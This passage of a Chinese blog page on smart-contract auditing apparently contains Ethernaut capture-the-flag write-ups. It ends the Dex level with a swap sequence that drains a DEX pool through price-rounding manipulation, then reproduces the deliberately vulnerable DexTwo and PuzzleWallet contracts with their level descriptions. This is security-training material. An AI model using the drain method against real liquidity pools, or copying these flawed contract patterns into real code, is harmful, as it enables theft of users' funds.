  token1 = 0
  token2 = 65
</code></pre>
<p>很好！此时 token2 剩 45，你有 65，可以继续压缩池子。</p>
<hr>
<h2 id="section-18">🎉 最终一击（耗尽 token1 或 token2）</h2><p>你现在用大量 token2 来换 token1：</p>
<pre><code class="language-plain">await contract.swap(token2addr, token1addr, 45)
</code></pre>
<p>计算：</p>
<pre><code class="language-plain">swap = 45 * 110 / 45 = 110
</code></pre>
<p>DEX 的 token1 会被一次性取光。</p>
<p>最终：</p>
<pre><code class="language-plain">DEX:
  token1 = 0
  token2 = 90

PLAYER:
  token1 = 110
  token2 = 20
</code></pre>
<p>只需要按照下面这个固定顺序 swap：</p>
<pre><code class="language-plain">T1 → T2 : 10
T2 → T1 : 20
T1 → T2 : 24
T2 → T1 : 30
T1 → T2 : 41
T2 → T1 : 45   ← 这里就爆掉一边了
</code></pre>
<h1>dex two</h1><p>这一关会要求你攻破<DexTwo>，这是上一关<Dex>合约经过细微修改后的版本，但需要用不同的方法。</p>
<p>你需要从DexTwo合约中提取出token1和token2的所有余额，才能成功通过此关卡。</p>
<p>你仍将从10个<code>token1</code>代币和10个<code>token2</code>代币开始。去中心化交易所（DEX）合约仍将从每种代币各100个开始。</p>
<pre><code class="language-solidity">// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

import &quot;openzeppelin-contracts-08/token/ERC20/IERC20.sol&quot;;
import &quot;openzeppelin-contracts-08/token/ERC20/ERC20.sol&quot;;
import &quot;openzeppelin-contracts-08/access/Ownable.sol&quot;;

contract DexTwo is Ownable {
  address public token1;
  address public token2;

  constructor() {}

  function setTokens(address _token1, address _token2) public onlyOwner {
    token1 = _token1;
    token2 = _token2;
  }

  function add_liquidity(address token_address, uint256 amount) public onlyOwner {
    IERC20(token_address).transferFrom(msg.sender, address(this), amount);
  }

  function swap(address from, address to, uint256 amount) public {
    require(IERC20(from).balanceOf(msg.sender) &gt;= amount, &quot;Not enough to swap&quot;);
    uint256 swapAmount = getSwapAmount(from, to, amount);
    IERC20(from).transferFrom(msg.sender, address(this), amount);
    IERC20(to).approve(address(this), swapAmount);
    IERC20(to).transferFrom(address(this), msg.sender, swapAmount);
  }

  function getSwapAmount(address from, address to, uint256 amount) public view returns (uint256) {
    return ((amount * IERC20(to).balanceOf(address(this))) / IERC20(from).balanceOf(address(this)));
  }

  function approve(address spender, uint256 amount) public {
    SwappableTokenTwo(token1).approve(msg.sender, spender, amount);
    SwappableTokenTwo(token2).approve(msg.sender, spender, amount);
  }

  function balanceOf(address token, address account) public view returns (uint256) {
    return IERC20(token).balanceOf(account);
  }
}

contract SwappableTokenTwo is ERC20 {
  address private _dex;

  constructor(address dexInstance, string memory name, string memory symbol, uint256 initialSupply)
  ERC20(name, symbol)
  {
    _mint(msg.sender, initialSupply);
    _dex = dexInstance;
  }

  function approve(address owner, address spender, uint256 amount) public {
    require(owner != _dex, &quot;InvalidApprover&quot;);
    super._approve(owner, spender, amount);
  }
}
</code></pre>
<pre><code class="language-solidity">await contract.address
&#39;0x4248FeA2f12Af183E8b9AD78a711F44De1990f80&#39;
await contract.owner()
&#39;0xf59112032D54862E199626F55cFad4F8a3b0Fce9&#39;
await contract.token2()
&#39;0x916ccee7bbC6852AB384eee3aC0e4d08E7767F5a&#39;
await contract.token1()
&#39;0xEB8Cc829102d8d06A772Aeb0cCd2230f6f5C7dfc&#39;

</code></pre>
<h1>puzzle wallet</h1><p>Nowadays, paying for DeFi operations is impossible, fact.如今，为去中心化金融操作付费是不可能的，这是事实。</p>
<p>A group of friends discovered how to slightly decrease the cost of performing multiple transactions by batching them in one transaction, so they developed a smart contract for doing this.一群朋友发现了通过将多笔交易合并为一笔来略微降低执行成本的方法，于是他们开发了一个用于实现这一功能的智能合约。</p>
<p>They needed this contract to be upgradeable in case the code contained a bug, and they also wanted to prevent people from outside the group from using it. To do so, they voted and assigned two people with special roles in the system: The admin, which has the power of updating the logic of the smart contract. The owner, which controls the whitelist of addresses allowed to use the contract. The contracts were deployed, and the group was whitelisted. Everyone cheered for their accomplishments against evil miners.他们希望这份合约是可升级的，以防代码中存在漏洞，同时也想阻止群组外的人使用它。为此，他们进行了投票，并在系统中为两个人分配了特殊角色：管理员，拥有更新智能合约逻辑的权力；所有者，控制着被允许使用该合约的地址白名单。合约部署完成后，该群组被加入白名单。所有人都为他们在对抗恶意矿工方面取得的成就而欢呼。</p>
<p>Little did they know, their lunch money was at risk…他们万万没想到，自己的午餐钱正处于危险之中……</p>
<p>You&#39;ll need to hijack this wallet to become the admin of the proxy.你需要劫持这个钱包才能成为代理的管理员</p>
<pre><code class="language-solidity">// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

import &quot;../helpers/UpgradeableProxy-08.sol&quot;;

contract PuzzleProxy is UpgradeableProxy {
    address public pendingAdmin;
    address public admin;

    constructor(address _admin, address _implementation, bytes memory _initData)
        UpgradeableProxy(_implementation, _initData)
    {
        admin = _admin;
    }

    modifier onlyAdmin() {
        require(msg.sender == admin, &quot;Caller is not the admin&quot;);
        _;
    }

    function proposeNewAdmin(address _newAdmin) external {
        pendingAdmin = _newAdmin;
    }

    function approveNewAdmin(address _expectedAdmin) external onlyAdmin {
        require(pendingAdmin == _expectedAdmin, &quot;Expected new admin by the current admin is not the pending admin&quot;);
        admin = pendingAdmin;
    }

    function upgradeTo(address _newImplementation) external onlyAdmin {
        _upgradeTo(_newImplementation);
    }
}

contract PuzzleWallet {
    address public owner;
    uint256 public maxBalance;
    mapping(address =&gt; bool) public whitelisted;
    mapping(address =&gt; uint256) public balances;

    function init(uint256 _maxBalance) public {
        require(maxBalance == 0, &quot;Already initialized&quot;);
        maxBalance = _maxBalance;
        owner = msg.sender;
    }

    modifier onlyWhitelisted() {
        require(whitelisted[msg.sender], &quot;Not whitelisted&quot;);
        _;
    }

    function setMaxBalance(uint256 _maxBalance) external onlyWhitelisted {
        require(address(this).balance == 0, &quot;Contract balance is not 0&quot;);
        maxBalance = _maxBalance;
    }

    function addToWhitelist(address addr) external {
        require(msg.sender == owner, &quot;Not the owner&quot;);
        whitelisted[addr] = true;
    }

    function deposit() external payable onlyWhitelisted {
        require(address(this).balance &lt;= maxBalance, &quot;Max balance reached&quot;);
        balances[msg.sender] += msg.value;
    }

    function execute(address to, uint256 value, bytes calldata data) external payable onlyWhitelisted {
        require(balances[msg.sender] &gt;= value, &quot;Insufficient balance&quot;);
        balances[msg.sender] -= value;
        (bool success,) = to.call{value: value}(data);
        require(success, &quot;Execution failed&quot;);
    }

    function multicall(bytes[] calldata data) external payable onlyWhitelisted {
        bool depositCalled = false;
        for (uint256 i = 0; i &lt; data.length; i++) {
            bytes memory _data = data[i];
            bytes4 selector;
            assembly {
                selector := mload(add(_data, 32))
            }
            if (selector == this.deposit.selector) {
                require(!depositCalled, &quot;Deposit can only be called once&quot;);
                // Protect against reusing msg.value
                depositCalled = true;
            }
            (bool success,) = address(this).delegatecall(data[i]);
            require(success, &quot;Error while delegating call&quot;);
        }
    }
}
</code></pre>
</div> <nav class="article-nav" style="display: flex; justify-content: space-between; margin-top: 64px; padding-top: 32px; border-top: 1px solid var(--line);"> <div class="nav-prev" style="flex: 1;"> <a href="/posts/web3/合约审计/审计思路与常见合约设计/" style="text-decoration: none;"> <p class="muted" style="margin: 0; font-size: 0.9rem; color: var(--muted);">&larr; 上一篇</p> <h4 style="margin: 8px 0 0; color: var(--ink);">审计思路与常见合约设计</h4> </a> </div> <div class="nav-next" style="flex: 1; text-align: right;"> <a href="/posts/web3/合约审计/Damn-vulnerable-defi/" style="text-decoration: none;"> <p class="muted" style="margin: 0; font-size: 0.9rem; color: var(--muted);">下一篇 &rarr;</p> <h4 style="margin: 8px 0 0; color: var(--ink);">Damn-vulnerable-defi</h4> </a> </div> </nav> </div> <aside class="article-sidebar"> <div class="article-progress" aria-label="阅读进度"> <div class="article-progress__meta"> <span>阅读进度</span> <strong id="article-progress-value">0%</strong> </div> <div class="article-progress__track"> <div class="article-progress__bar" id="article-progress-bar"></div> </div> </div> <nav class="article-outline" aria-label="文章目录"> <div class="article-outline__head"> <strong>文章目录</strong> </div> <ol class="article-outline__list"> <li class="article-outline__item depth-2" data-toc-id="section-1"> <a href="#section-1">思路</a> </li><li class="article-outline__item depth-2" data-toc-id="section-2"> <a href="#section-2">什么是回调机制？</a> </li><li class="article-outline__item depth-2" data-toc-id="section-3"> <a href="#section-3">Solidity 中的回调函数有两种</a> </li><li class="article-outline__item depth-2" data-toc-id="section-4"> <a href="#section-4">① receive()</a> </li><li class="article-outline__item depth-2" data-toc-id="section-5"> <a href="#section-5">② fallback(bytes calldata)</a> </li><li class="article-outline__item depth-2" data-toc-id="section-6"> <a href="#section-6">exp</a> </li><li class="article-outline__item depth-3" data-toc-id="section-7"> <a href="#section-7">错误的思路</a> </li><li class="article-outline__item depth-3" data-toc-id="section-8"> <a href="#section-8">✅ 为什么在 Denial 必须保留 receive？</a> </li><li class="article-outline__item depth-3" data-toc-id="section-9"> <a href="#section-9">✔️ 要想卡死 withdraw，必须让 partner.call 成功进入“回调”，然后在回调里卡死。</a> </li><li class="article-outline__item depth-3" data-toc-id="section-10"> <a href="#section-10">✅ 那为什么你的 receive 里用 assert(false) 是 OK 的？</a> </li><li class="article-outline__item depth-2" data-toc-id="section-11"> <a href="#section-11">攻击思路（简述）</a> </li><li class="article-outline__item depth-2" data-toc-id="section-12"> <a href="#section-12">✅ 第一步</a> </li><li class="article-outline__item depth-2" data-toc-id="section-13"> <a href="#section-13">✅ 第二步</a> </li><li class="article-outline__item depth-2" data-toc-id="section-14"> <a href="#section-14">✅ 第三步</a> </li><li class="article-outline__item depth-2" data-toc-id="section-15"> <a href="#section-15">✅ 第四步</a> </li><li class="article-outline__item depth-2" data-toc-id="section-16"> <a href="#section-16">⚠️ 注意：池子此时开始失衡</a> </li><li class="article-outline__item depth-2" data-toc-id="section-17"> <a href="#section-17">✅ 第五步</a> </li><li class="article-outline__item depth-2" data-toc-id="section-18"> <a href="#section-18">🎉 最终一击（耗尽 token1 或 token2）</a> </li> </ol> </nav> </aside> </div> </article>  </main> <script>
      (() => {
        const root = document.documentElement;
        const scrollFlagKey = "scroll-to-top-once";

        const bindScrollReset = () => {
          try {
            if ("scrollRestoration" in history) {
              history.scrollRestoration = "manual";
            }

            if (sessionStorage.getItem(scrollFlagKey) === "1") {
              sessionStorage.removeItem(scrollFlagKey);
              requestAnimationFrame(() => window.scrollTo({ top: 0, left: 0, behavior: "auto" }));
            }
          } catch {}

          document.addEventListener("click", (event) => {
            const target = event.target;
            if (!(target instanceof Element)) return;

            const link = target.closest("a");
            if (!(link instanceof HTMLAnchorElement)) return;

            if (link.target && link.target !== "_self") return;
            if (link.hasAttribute("download")) return;

            const href = link.getAttribute("href");
            if (!href || href.startsWith("#")) return;

            try {
              const url = new URL(link.href, window.location.href);
              if (url.origin !== window.location.origin) return;
              if (url.pathname === window.location.pathname && url.hash) return;
              sessionStorage.setItem(scrollFlagKey, "1");
            } catch {}
          });
        };

        const bindToggle = () => {
          const btn = document.getElementById("theme-toggle");
          if (!btn) return;
          const next = btn.cloneNode(true);
          btn.replaceWith(next);
          next.addEventListener("click", () => {
            const current = root.getAttribute("data-theme") === "dark" ? "dark" : "light";
            const value = current === "dark" ? "light" : "dark";
            root.setAttribute("data-theme", value);
            try { localStorage.setItem("theme", value); } catch {}
          });
        };

        bindScrollReset();
        bindToggle();
      })();
    </script> </body> </html>  <script>
      (() => {
        const articleContent = document.querySelector(".article-content");
        const headings = Array.from(document.querySelectorAll(".article-content h2[id], .article-content h3[id]"));
        const links = Array.from(document.querySelectorAll(".article-outline a[href^='#']"));
        const progressBar = document.getElementById("article-progress-bar");
        const progressValue = document.getElementById("article-progress-value");

        if (!articleContent || !headings.length || !links.length) return;

        const itemMap = new Map(
          links.map((link) => {
            const id = decodeURIComponent((link.getAttribute("href") || "").replace(/^#/, ""));
            return [id, link.closest(".article-outline__item")];
          }),
        );

        let lastH2Id = "";
        const headingMeta = headings.map((heading) => {
          const depth = Number(heading.tagName.slice(1));
          if (depth === 2) {
            lastH2Id = heading.id;
          }

          return {
            id: heading.id,
            depth,
            parentId: depth === 3 ? lastH2Id : "",
            element: heading,
          };
        });

        let activeId = "";
        let activeParentId = "";
        let ticking = false;

        const setActive = (id, parentId = "") => {
          if (!id || (id === activeId && parentId === activeParentId)) return;

          activeId = id;
          activeParentId = parentId;

          links.forEach((link) => {
            const targetId = decodeURIComponent((link.getAttribute("href") || "").replace(/^#/, ""));
            const isCurrent = targetId === id;
            const isParentActive = Boolean(parentId && targetId === parentId && targetId !== id);

            link.toggleAttribute("aria-current", isCurrent);
            link.classList.toggle("is-current", isCurrent);
            link.classList.toggle("is-parent-active", isParentActive);
          });

          itemMap.forEach((item, itemId) => {
            if (!item) return;
            item.classList.toggle("is-current", itemId === id);
            item.classList.toggle("is-parent-active", Boolean(parentId && itemId === parentId && itemId !== id));
          });

          const activeLink = links.find((link) => decodeURIComponent((link.getAttribute("href") || "").replace(/^#/, "")) === id);
          activeLink?.scrollIntoView({ block: "nearest", inline: "nearest" });
        };

        const updateProgress = () => {
          if (!progressBar || !progressValue) return;

          const articleRect = articleContent.getBoundingClientRect();
          const articleTop = window.scrollY + articleRect.top;
          const start = articleTop - 140;
          const end = articleTop + articleContent.scrollHeight - window.innerHeight * 0.55;
          const distance = Math.max(end - start, 1);
          const ratio = Math.min(Math.max((window.scrollY - start) / distance, 0), 1);
          const percent = Math.round(ratio * 100);

          progressBar.style.transform = `scaleX(${ratio})`;
          progressValue.textContent = `${percent}%`;
        };

        const updateOutline = () => {
          ticking = false;

          let current = headingMeta[0];
          for (const heading of headingMeta) {
            if (heading.element.getBoundingClientRect().top <= 160) {
              current = heading;
            } else {
              break;
            }
          }

          if (current) {
            setActive(current.id, current.parentId);
          }

          updateProgress();
        };

        const requestUpdate = () => {
          if (ticking) return;
          ticking = true;
          window.requestAnimationFrame(updateOutline);
        };

        window.addEventListener("scroll", requestUpdate, { passive: true });
        window.addEventListener("resize", requestUpdate);
        window.addEventListener("hashchange", requestUpdate);
        requestUpdate();
      })();
    </script>